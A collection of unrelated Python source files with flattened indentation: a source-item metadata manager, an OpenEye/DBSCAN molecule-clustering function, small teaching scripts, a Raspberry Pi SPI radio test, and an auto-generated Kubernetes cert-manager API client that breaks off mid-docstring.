prefix = current_item.item_id.rpartition("/")[0]
if prefix != "":
return prefix + "/" + relative_itemid[2:]
else:
return relative_itemid[2:]
else:
return relative_itemid
def get_items(self, itemidpattern):
"""Returns all items where the itemid expression matches. The expression can contain * as placeholder."""
return [item for item in self if SourceItemList.match(itemidpattern, item.item_id)]
class SourceItem(Loggable):
"""Represents an item in a source"""
def __init__(self, source, item_id):
self.source = source
self.item_id = item_id
self.log_id = self.source.source_id + "!" + item_id
def _get_all_filenames(self):
absolute_paths = glob.glob(self.source.get_absolute_path(self.item_id + ".*")) + glob.glob(self.source.get_absolute_path(self.item_id + "@*"))
local_paths = [self.source.get_local_path(abspath) for abspath in absolute_paths]
return [local_path for local_path in local_paths if re.match(extractor.RE_ITEMFILE, local_path)]
def _get_itemfile(self):
		item_filetypes = [ext for (ext, extr) in extractor.registered_extractors] #the item file is the first one from this list that exists
for filetype in item_filetypes:
filename = self.item_id + "." + filetype
if os.path.isfile(self.source.get_absolute_path(filename)):
return filename
return None #item does not exist
def _exists(self):
return not(self.itemfile == None)
def _get_contentfile(self):
content_filetypes = [".md", ".txt", ".png", ".jpg"] #item file is the one exisiting first from this list
for filetype in content_filetypes:
filename = self.item_id + filetype
if os.path.isfile(self.source.get_absolute_path(filename)):
return filename
return None #item does not exist
def _get_content_filenames(self):
contentfiles = self.files
itemfile = self.item_id + ".item"
if contentfiles.count(itemfile):
contentfiles.remove(itemfile)
return contentfiles
def _get_mtime(self):
return max([os.path.getmtime(self.source.get_absolute_path(filename)) for filename in self.files])
def get_metadata(self, strict = False):
metadata = {}
#general metadata
metadata["last-modified"] = self.mtime
#content file metadata
if self.contentfile and self.contentfile != self.itemfile:
ext = re.match(extractor.RE_ITEM_SPLIT_ITEMID_EXTENSION, self.contentfile).group(2)
if extractor.is_supported(ext):
try:
metadata.update(extractor.extract_metadata(self.source.get_absolute_path(self.contentfile)))
except Exception, e:
if not strict:
self.log_exception("No metadata extracted from file '" + self.contentfile + "'.", Logtype.WARNING)
else:
throw(ValueError, "No metadata extracted from file '" + self.contentfile + "'.", e)
#item file metadata
metadata.update(extractor.extract_metadata(self.source.get_absolute_path(self.itemfile)))
metadata = self.postprocess_metadata(metadata)
return metadata
def postprocess_metadata(self, metadata):
if isinstance(metadata, basestring):
if re.match(extractor.RE_ITEM_REFERENCE, metadata):
matching_item_ids = self.source.resolve_reference(metadata,self,allow_patterns=True)
if isinstance(matching_item_ids, list):
return ["!" + item_id for item_id in matching_item_ids]
else:
return "!" + matching_item_ids #only one id
else:
return metadata
elif isinstance(metadata, list):
l = []
for x in metadata:
processed = self.postprocess_metadata(x)
if isinstance(x, basestring) and isinstance(processed, list):
l.extend(processed) #if item pattern was extended to multiple item ids extend list
else:
l.append(processed)
return l
elif isinstance(metadata, dict):
return {k: self.postprocess_metadata(v) for k,v in metadata.items()}
else:
return metadata
files = property(_get_all_filenames)
itemfile = property(_get_itemfile)
exists = property(_exists)
contentfile = property(_get_contentfile)
contentfiles = property(_get_content_filenames)
mtime = property(_get_mtime)
metadata = property(get_metadata)
class IncrementalChange:
"""Abstract class representing an incrental change in source"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, source, item_id):
self.source = source
self.item_id = item_id
class MetaChanged(IncrementalChange):
def __init__(self, source, filename):
super(MetaChanged, self).__init__(source,filename)
def __str__(self):
return "<MetaChanged " + sstr(self.item_id) + ">"
class ItemChanged(IncrementalChange):
def __init__(self, source, item_id, filename):
super(ItemChanged, self).__init__(source,item_id)
self.filename = filename
def _getitem(self):
return self.source.items[self.item_id]
def __str__(self):
return "<ItemChanged " + sstr(self.item_id) + ">"
item = property(_getitem)
class ItemRemoved(IncrementalChange):
def __init__(self, source, item_id):
super(ItemRemoved, self).__init__(source,item_id)
def __str__(self):
return "<ItemRemoved " + sstr(self.item_id) + ">"
|
import logging
import numpy as np
from openeye import oechem, oegraphsim
from sklearn.cluster import DBSCAN
logger = logging.getLogger(__name__)
def cluster_similar_molecules(
smiles, fingerprint_type=oegraphsim.OEFPType_Tree, eps=0.5, min_samples=2
):
"""The method attempts to cluster a sets of molecules based on their
similarity using a Tanimoto distance metric and the `sklearn` DBSCAN
clustering code.
Notes
-----
This is based on the code by David Mobley:
https://github.com/openforcefield/release-1-benchmarking/blob/master/QM_molecule_selection/divide_sets.ipynb
Parameters
----------
smiles: list of str
The SMILES representations of the molecules to cluster.
fingerprint_type
The type of molecular fingerprint to use.
eps: float
The `eps` parameter to pass as an argument to DBSCAN while clustering.
min_samples: int
The `min_samples` parameter to pass as an argument to DBSCAN while
clustering.
Returns
-------
dict of str and list of str
The clustered SMILES patterns.
"""
assert isinstance(smiles, list)
# Build fingerprints
fingerprints = {}
for smiles_pattern in smiles:
oe_molecule = oechem.OEMol()
oechem.OEParseSmiles(oe_molecule, smiles_pattern)
fingerprint = oegraphsim.OEFingerPrint()
oegraphsim.OEMakeFP(fingerprint, oe_molecule, fingerprint_type)
fingerprints[smiles_pattern] = fingerprint
    # Build a pairwise Tanimoto distance matrix (1 - similarity)
distance_matrix = np.zeros((len(smiles), len(smiles)))
for i, smiles_i in enumerate(smiles):
for j, smiles_j in enumerate(smiles):
if i == j:
continue
distance_matrix[i, j] = 1.0 - oegraphsim.OETanimoto(
fingerprints[smiles_i], fingerprints[smiles_j]
)
# Cluster the data
clustering = DBSCAN(eps=eps, min_samples=min_samples, metric="precomputed")
clustered_smiles = clustering.fit(distance_matrix)
labels = clustered_smiles.labels_
smiles_by_cluster = {}
for label in set(labels):
smiles_by_cluster[label] = [
smiles[i] for i, x in enumerate(labels) if x == label
]
return smiles_by_cluster
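# Illustrative call (added; requires an OpenEye licence, and the SMILES are
# arbitrary examples):
#
#     clusters = cluster_similar_molecules(["CCO", "CCCO", "CCCCO", "c1ccccc1"])
#     # -> dict mapping DBSCAN labels (-1 means noise) to lists of SMILES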
|
n = int(input('Enter a number: '))
print('MULTIPLICATION TABLE')
for c in range(1, 11):
    print(f'{n} x {c} = {n*c}')
|
import typing
from fiepipelib.gitaspect.routines.config import GitAspectConfigurationRoutines
from fiepipelib.rootaspect.data.config import RootAsepctConfiguration
TR = typing.TypeVar("TR", bound=RootAsepctConfiguration)
class RootAspectConfigurationRoutines(GitAspectConfigurationRoutines[TR], typing.Generic[TR]):
    """Configuration routines for root aspects; all behavior is inherited from
    GitAspectConfigurationRoutines, specialized by the TR configuration type."""
    pass
|
# Matt Grimm
# USAFA
# nRF24L01+ Wireless Communication
# 7 November 2016
import RPi.GPIO as GPIO
import time
import sys,signal
import spidev
GPIO.setmode(GPIO.BCM)
GPIO.setup(11,GPIO.IN)
rx_buf = [0] * 9  # buffer for 9 sampled bits (indices 0-8; int_step wraps at 9)
int_step = 0
def signal_handler(signal,frame):
print("\nprogram exiting")
GPIO.cleanup()
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
def my_callback(channel):
GPIO.setmode(GPIO.BCM) # Not sure why I have to redo this part....???
GPIO.setup(9,GPIO.IN)
global int_step
    print(str(GPIO.input(9)))  # GPIO.input() reads the pin; GPIO.IN is only the direction constant
    rx_buf[int_step] = GPIO.input(9)
    int_step += 1
    if int_step == 9:
int_step = 0
GPIO.add_event_detect(11,GPIO.RISING,callback=my_callback)
# sourceforge.net/p/raspberry-gpio-python/wiki/Inputs
# Has actually corrupted Pi memory before... Solution was to restart.
# Might actually just be messing up the SPI config by toggling the GPIO and MISO pins.
spi = spidev.SpiDev()
spi.open(0,0) #bus,device
spi2 = spidev.SpiDev()
spi2.open(1,1) # open SPI1 CE1
# Had to do a lot to use SP1. Needed to change hardware overlay and add
# spi-cs3 to use spi1. Also, had to disable bluetooth because its overlay interferes with
# spi1. raspberrypi.org/forums/viewtopic.php?f=29&t=146291
spi2.max_speed_hz = 7629
spi.max_speed_hz = 7629
# For testing purposes, I am connecting SPI0 MOSI to SPI1 MISO right now.
#while True:
spi.xfer([0xAA])
spi.close()
spi2.close()
GPIO.cleanup()
|
# step 1: imports
from typing import Generic, TypeVar
# step 2: define generic types to be specified later
T1 = TypeVar("T1")
T2 = TypeVar("T2")
# step 3: define generic class
class MyGenericClass(Generic[T1, T2]):
def do_something(self, value1: T1, value2: T2):
print(f"doing something with {value1} and {value2}")
# step 4: specify generic types and use the class!
o = MyGenericClass[str, int]()
# will print "doing something with hello and 42"
o.do_something("hello", 42)
# will print "doing something with 42 and hello" but type checker will fail: your code is safe with type checker
o.do_something(42, "hello")
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from kubernetes.client.api_client import ApiClient
from kubernetes.client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class CertManagerIoV1alpha3Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_cluster_issuer(self, body, **kwargs): # noqa: E501
"""create_cluster_issuer # noqa: E501
create a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_issuer(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_cluster_issuer_with_http_info(body, **kwargs) # noqa: E501
def create_cluster_issuer_with_http_info(self, body, **kwargs): # noqa: E501
"""create_cluster_issuer # noqa: E501
create a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_issuer_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
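    # Illustrative usage (added; not generated code): with a configured client,
    # a ClusterIssuer manifest can be submitted as
    #
    #     api = CertManagerIoV1alpha3Api()
    #     api.create_cluster_issuer(body=cluster_issuer_manifest)
    #
    # where `cluster_issuer_manifest` is an assumed dict/model for the CRD.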
def create_namespaced_certificate(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate # noqa: E501
create a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_namespaced_certificate_with_http_info(namespace, body, **kwargs) # noqa: E501
def create_namespaced_certificate_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate # noqa: E501
create a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `create_namespaced_certificate`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_namespaced_certificate_request(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate_request # noqa: E501
create a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate_request(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_namespaced_certificate_request_with_http_info(namespace, body, **kwargs) # noqa: E501
def create_namespaced_certificate_request_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate_request # noqa: E501
create a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate_request_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `create_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_namespaced_issuer(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_issuer # noqa: E501
create an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_issuer(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_namespaced_issuer_with_http_info(namespace, body, **kwargs) # noqa: E501
def create_namespaced_issuer_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_issuer # noqa: E501
create an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_issuer_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `create_namespaced_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
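
# The *_with_http_info variant returns the deserialized body together with the
# HTTP status code and response headers, per the docstring above. Sketch (same
# hypothetical `api` and `issuer_body` as above):
#
#   issuer, status, headers = api.create_namespaced_issuer_with_http_info(
#       "default", issuer_body)
#   # status is typically 201 for a create; headers is an HTTPHeaderDict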
def delete_cluster_issuer(self, name, **kwargs): # noqa: E501
"""delete_cluster_issuer # noqa: E501
delete a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_cluster_issuer(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. The value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used, defaulting to a per-object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Should the dependent objects be orphaned? If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
